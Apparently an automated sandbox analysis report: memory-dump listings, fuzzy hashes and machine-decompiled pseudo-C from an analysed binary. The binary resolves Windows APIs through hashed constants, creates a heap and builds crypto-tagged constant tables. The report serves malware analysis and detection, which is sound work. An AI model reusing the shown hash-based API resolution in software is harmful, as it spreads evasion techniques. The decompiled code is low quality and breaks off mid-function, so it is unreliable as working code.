Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: 2facc822e2d1ca0664c0c60625c4d8acbdfd09e0180d59800f24874bfcf79fa0
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: 7AF06870348647ABFB40A5B8AE68F7F32ED5BC1614F548838B540CA1A4DF74C94D8625

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D3628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6E7D3628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6e7dd228 == 0xa33c83e5) {
					_t7 = E6E7D3064(0x60a28c5c, 0x1c6ef387);
					 *0x6e7dd22c = E6E7D3064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6e7dd228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6e7dd228 = 0;
					}
				}
				_t3 = E6E7D3064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6e7dd228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6e7d3630
0x6e7d3638
0x6e7d366b
0x6e7d367c
0x6e7d3687
0x6e7d3692
0x6e7d3694
0x6e7d3694
0x6e7d3687
0x6e7d3644
0x6e7d364b
0x00000000
0x6e7d364d
0x6e7d364d
0x6e7d364e
0x6e7d3650
0x6e7d3652
0x6e7d3653
0x00000000
0x6e7d3653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6E7CDE09,?,?), ref: 6E7D3692

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: bbba84513d02345235ee8c4d0c8c0e56420f8d7667871567637ff0b853d1751f
Instruction ID: ce96c327eb83f067533d71b767fc9c8ad880a2c27e2bcfaba57801352f3c6aff
Opcode Fuzzy Hash: bbba84513d02345235ee8c4d0c8c0e56420f8d7667871567637ff0b853d1751f
Instruction Fuzzy Hash: CAF09E30216280BEEA601DF6FD0CD529698FF50245F040C39F380E1124D7B48448CE35

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E7C1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6E7C1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E7CF584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v76, E6E7CF4CC( &_v76) + 0x10);
				E6E7CF4BC( &_v80, E6E7CF4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v84, E6E7CF4CC(_t325) + 0x10);
				E6E7CF4BC( &_v88, E6E7CF4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v92, E6E7CF4CC(_t329) + 0x10);
				E6E7CF4BC( &_v96, E6E7CF4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v100, E6E7CF4CC(_t333) + 0x10);
				E6E7CF4BC( &_v104, E6E7CF4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v108, E6E7CF4CC(_t337) + 0x10);
				E6E7CF4BC( &_v112, E6E7CF4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v116, E6E7CF4CC(_t341) + 0x10);
				E6E7CF4BC( &_v120, E6E7CF4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v124, E6E7CF4CC(_t345) + 0x10);
				E6E7CF4BC( &_v128, E6E7CF4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v132, E6E7CF4CC(_t349) + 0x10);
				E6E7CF4BC( &_v136, E6E7CF4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v140, E6E7CF4CC(_t353) + 0x10);
				E6E7CF4BC( &_v144, E6E7CF4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v148, E6E7CF4CC(_t357) + 0x10);
				E6E7CF4BC( &_v152, E6E7CF4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v156, E6E7CF4CC(_t361) + 0x10);
				E6E7CF4BC( &_v160, E6E7CF4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v164, E6E7CF4CC(_t365) + 0x10);
				E6E7CF4BC( &_v168, E6E7CF4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v172, E6E7CF4CC(_t369) + 0x10);
				E6E7CF4BC( &_v176, E6E7CF4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v180, E6E7CF4CC(_t373) + 0x10);
				E6E7CF4BC( &_v184, E6E7CF4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v188, E6E7CF4CC(_t377) + 0x10);
				E6E7CF4BC( &_v192, E6E7CF4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v196, E6E7CF4CC(_t381) + 0x10);
				E6E7CF4BC( &_v200, E6E7CF4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v204, E6E7CF4CC(_t385) + 0x10);
				E6E7CF4BC( &_v208, E6E7CF4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6E7D4200(0x60a28c5c, _t434);
				E6E7CF4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E7CF4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E7CF4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E7CF4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E7CF4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E7CF4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E7CF4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E7CF4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E7CF4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E7CF4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E7CF4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E7CF4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E7CF4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E7CF4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6E7CF4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E7CF4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E7CF4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E7C1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E7CB27C( &_v248, _v256, _t481, _v252, _t318);
				E6E7CF840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v296, E6E7CF4CC(_t410) + 0x10);
				E6E7CF4BC( &_v300, E6E7CF4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v304, E6E7CF4CC(_t414) + 0x10);
				E6E7CF4BC( &_v308, E6E7CF4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v312, E6E7CF4CC(_t418) + 0x10);
				E6E7CF4BC( &_v316, E6E7CF4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v320, E6E7CF4CC(_t422) + 0x10);
				E6E7CF4BC( &_v324, E6E7CF4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E7CB9FC(_t154,  *_t480);
				E6E7CF4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6E7CF4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E7CF4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E7CF4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E7CF654( &_v316);
				return E6E7CF654( &_v356);
			}

0x6e7c1494
0x6e7c1498
0x6e7c149d
0x6e7c14a3
0x6e7c14ab
0x6e7c14b0
0x6e7c14bc
0x6e7c14c0
0x6e7c14d2
0x6e7c14e8
0x6e7c14f3
0x6e7c14f4
0x6e7c14f5
0x6e7c14f6
0x6e7c14f7
0x6e7c14fa
0x6e7c14fe
0x6e7c1502
0x6e7c1509
0x6e7c151b
0x6e7c1531
0x6e7c153c
0x6e7c153d
0x6e7c153e
0x6e7c153f
0x6e7c1540
0x6e7c1543
0x6e7c1547
0x6e7c154b
0x6e7c1552
0x6e7c1564
0x6e7c157a
0x6e7c1585
0x6e7c1586
0x6e7c1587
0x6e7c1588
0x6e7c1589
0x6e7c158c
0x6e7c1590
0x6e7c1594
0x6e7c159b
0x6e7c15ad
0x6e7c15c3
0x6e7c15ce
0x6e7c15cf
0x6e7c15d0
0x6e7c15d1
0x6e7c15d2
0x6e7c15d5
0x6e7c15d9
0x6e7c15dd
0x6e7c15e4
0x6e7c15f6
0x6e7c160c
0x6e7c1617
0x6e7c1618
0x6e7c1619
0x6e7c161a
0x6e7c161b
0x6e7c161e
0x6e7c1622
0x6e7c1626
0x6e7c162d
0x6e7c163f
0x6e7c1655
0x6e7c1660
0x6e7c1661
0x6e7c1662
0x6e7c1663
0x6e7c1664
0x6e7c1667
0x6e7c166b
0x6e7c166f
0x6e7c1676
0x6e7c1688
0x6e7c169e
0x6e7c16a9
0x6e7c16aa
0x6e7c16ab
0x6e7c16ac
0x6e7c16ad
0x6e7c16b0
0x6e7c16b4
0x6e7c16b8
0x6e7c16bf
0x6e7c16d1
0x6e7c16e7
0x6e7c16f2
0x6e7c16f3
0x6e7c16f4
0x6e7c16f5
0x6e7c16f6
0x6e7c16f9
0x6e7c16fd
0x6e7c1701
0x6e7c1708
0x6e7c171a
0x6e7c1730
0x6e7c173b
0x6e7c173c
0x6e7c173d
0x6e7c173e
0x6e7c173f
0x6e7c1742
0x6e7c1746
0x6e7c174a
0x6e7c1751
0x6e7c1763
0x6e7c1779
0x6e7c1784
0x6e7c1785
0x6e7c1786
0x6e7c1787
0x6e7c1788
0x6e7c178b
0x6e7c178f
0x6e7c1793
0x6e7c179a
0x6e7c17ac
0x6e7c17c2
0x6e7c17cd
0x6e7c17ce
0x6e7c17cf
0x6e7c17d0
0x6e7c17d1
0x6e7c17d4
0x6e7c17d8
0x6e7c17dc
0x6e7c17e3
0x6e7c17f5
0x6e7c180b
0x6e7c1816
0x6e7c1817
0x6e7c1818
0x6e7c1819
0x6e7c181a
0x6e7c181d
0x6e7c1821
0x6e7c1825
0x6e7c182c
0x6e7c183e
0x6e7c1854
0x6e7c185f
0x6e7c1860
0x6e7c1861
0x6e7c1862
0x6e7c1863
0x6e7c1866
0x6e7c186a
0x6e7c186e
0x6e7c1875
0x6e7c1887
0x6e7c189d
0x6e7c18a8
0x6e7c18a9
0x6e7c18aa
0x6e7c18ab
0x6e7c18ac
0x6e7c18af
0x6e7c18b3
0x6e7c18b7
0x6e7c18be
0x6e7c18d0
0x6e7c18e6
0x6e7c18f1
0x6e7c18f2
0x6e7c18f3
0x6e7c18f4
0x6e7c18f5
0x6e7c18f8
0x6e7c18fc
0x6e7c1900
0x6e7c1907
0x6e7c1919
0x6e7c192f
0x6e7c193a
0x6e7c193b
0x6e7c193c
0x6e7c193d
0x6e7c193e
0x6e7c1941
0x6e7c1945
0x6e7c1949
0x6e7c1950
0x6e7c1962
0x6e7c1978
0x6e7c1983
0x6e7c1984
0x6e7c1985
0x6e7c1986
0x6e7c198c
0x6e7c198f
0x6e7c1991
0x6e7c199c
0x6e7c19a3
0x6e7c19ac
0x6e7c19b4
0x6e7c19bb
0x6e7c19c4
0x6e7c19cc
0x6e7c19d3
0x6e7c19dc
0x6e7c19e4
0x6e7c19eb
0x6e7c19f4
0x6e7c19fc
0x6e7c1a03
0x6e7c1a0c
0x6e7c1a14
0x6e7c1a1b
0x6e7c1a24
0x6e7c1a2c
0x6e7c1a36
0x6e7c1a3f
0x6e7c1a47
0x6e7c1a51
0x6e7c1a5a
0x6e7c1a62
0x6e7c1a6c
0x6e7c1a75
0x6e7c1a7d
0x6e7c1a87
0x6e7c1a90
0x6e7c1a98
0x6e7c1aa2
0x6e7c1aab
0x6e7c1ab3
0x6e7c1abd
0x6e7c1ac6
0x6e7c1ace
0x6e7c1ad8
0x6e7c1ae1
0x6e7c1ae9
0x6e7c1af3
0x6e7c1afc
0x6e7c1b04
0x6e7c1b0e
0x6e7c1b17
0x6e7c1b1f
0x6e7c1b26
0x6e7c1b2f
0x6e7c1b37
0x6e7c1b3e
0x6e7c1b43
0x6e7c1b51
0x6e7c1b55
0x6e7c1b64
0x6e7c1b6d
0x6e7c1b72
0x6e7c1b79
0x6e7c1b7d
0x6e7c1b81
0x6e7c1b88
0x6e7c1b9a
0x6e7c1bb0
0x6e7c1bbb
0x6e7c1bbc
0x6e7c1bbd
0x6e7c1bbe
0x6e7c1bbf
0x6e7c1bc2
0x6e7c1bc6
0x6e7c1bca
0x6e7c1bd1
0x6e7c1be3
0x6e7c1bf9
0x6e7c1c04
0x6e7c1c05
0x6e7c1c06
0x6e7c1c07
0x6e7c1c08
0x6e7c1c0b
0x6e7c1c0f
0x6e7c1c13
0x6e7c1c1a
0x6e7c1c2c
0x6e7c1c42
0x6e7c1c4d
0x6e7c1c4e
0x6e7c1c4f
0x6e7c1c50
0x6e7c1c51
0x6e7c1c54
0x6e7c1c58
0x6e7c1c5c
0x6e7c1c63
0x6e7c1c75
0x6e7c1c8b
0x6e7c1c96
0x6e7c1c97
0x6e7c1c98
0x6e7c1c99
0x6e7c1c9a
0x6e7c1c9d
0x6e7c1ca0
0x6e7c1ca1
0x6e7c1ca2
0x6e7c1ca9
0x6e7c1cac
0x6e7c1cb7
0x6e7c1cbe
0x6e7c1cc7
0x6e7c1ccf
0x6e7c1cd6
0x6e7c1cdf
0x6e7c1ce7
0x6e7c1cee
0x6e7c1cf7
0x6e7c1cff
0x6e7c1d04
0x6e7c1d0d
0x6e7c1d15
0x6e7c1d2a

Strings

8nsK, xrefs: 6E7C1900

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 0169b8ceb924bd624878aa4738d3681c76bd49814fd1019c6749b6d78cbf519c
Instruction ID: 2da114bc9d585c1783a5df0a41bdb82e3a988ff807034f2834a063daba5f857b
Opcode Fuzzy Hash: 0169b8ceb924bd624878aa4738d3681c76bd49814fd1019c6749b6d78cbf519c
Instruction Fuzzy Hash: 5D32A672404A069EC719DF60CD505DF77E8AFA1708F204F1DB9895A1B2FF71EA86C682

Uniqueness

Uniqueness Score: -1.00%

Function 6E7CA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6E7CA4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E7CB658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E7CF4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E7CF654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6E7D2234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E7CF654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E7CF584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E7CF584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6e7db808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6E7D3064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E7CB5C4(_t439 + 0x34);
											E6E7CB5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6E7CB5C4(_t439 + 0x34);
										E6E7CB5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6E7CF4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E7CCA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E7CC280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E7CF828(_t439 + 0x14, E6E7CF4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E7CF4BC(_t439 + 0x14, E6E7CF4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6E7D3064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E7CF828(_t439 + 0x40, E6E7CF4CC(_t439 + 0x3c) + 4);
											 *(E6E7CF4BC(_t439 + 0x40, E6E7CF4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E7CCD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E7CF4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
